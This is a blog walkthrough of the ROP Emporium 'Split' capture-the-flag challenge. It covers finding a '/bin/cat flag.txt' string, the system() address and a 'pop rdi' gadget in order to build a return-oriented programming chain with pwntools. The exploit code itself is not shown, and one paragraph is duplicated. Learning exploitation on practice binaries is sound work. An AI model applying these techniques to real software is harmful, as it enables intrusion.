ROP Emporium : Split
Hey folks!
Today we are gonna do the another little ROP and hopefully learn a little about the pwntools, for the binary we are going to use x64 from ROP emporium "Split"
Let's start with enumerating the binary, I am going to load it in radare2 by using r2, and pass aaa to analyze all flags and look for the interesting strings (if any)
So once you look in closely you'll see the
vaddr=0x00601060 paddr=0x00001060 ordinal=036 sz=18 len=17 section=.data type=ascii string=/bin/cat flag.txt
Let's take vaddr=0x00601060 and just save it, this is one of the important address we will need to make our ROP chain.
This out of the way, I started to look for the functions inside the binary by using afl command.Once I saw the functions inside the binary, my attention was caught by the sym.usefulFunction and sym.main, so I further disas them.Today we are gonna do the another little ROP and hopefully learn a little about the pwntools, for the binary we are going to use x64 from ROP emporium "Split"
Let's start with enumerating the binary, I am going to load it in radare2 by using r2, and pass aaa to analyze all flags and look for the interesting strings (if any)
So once you look in closely you'll see the
vaddr=0x00601060 paddr=0x00001060 ordinal=036 sz=18 len=17 section=.data type=ascii string=/bin/cat flag.txt
Let's take vaddr=0x00601060 and just save it, this is one of the important address we will need to make our ROP chain.
Now as in the snippet above I took system address from usefulFunction i.e
0x00400810
Now once this is done we are half way through now we used a tool called ropper to get the address of "pop rdi;"
So now we have the final element, and we can start building our exploit.
Once the exploit is complete it's what it looks like, refer the comments to get started with pwntools.
Exploit in action:-
So that's how manual ROP works, I will be posting the fully automatic ROP for split and automated BoF for ret2win next!
Thank You!!
Comments
Post a Comment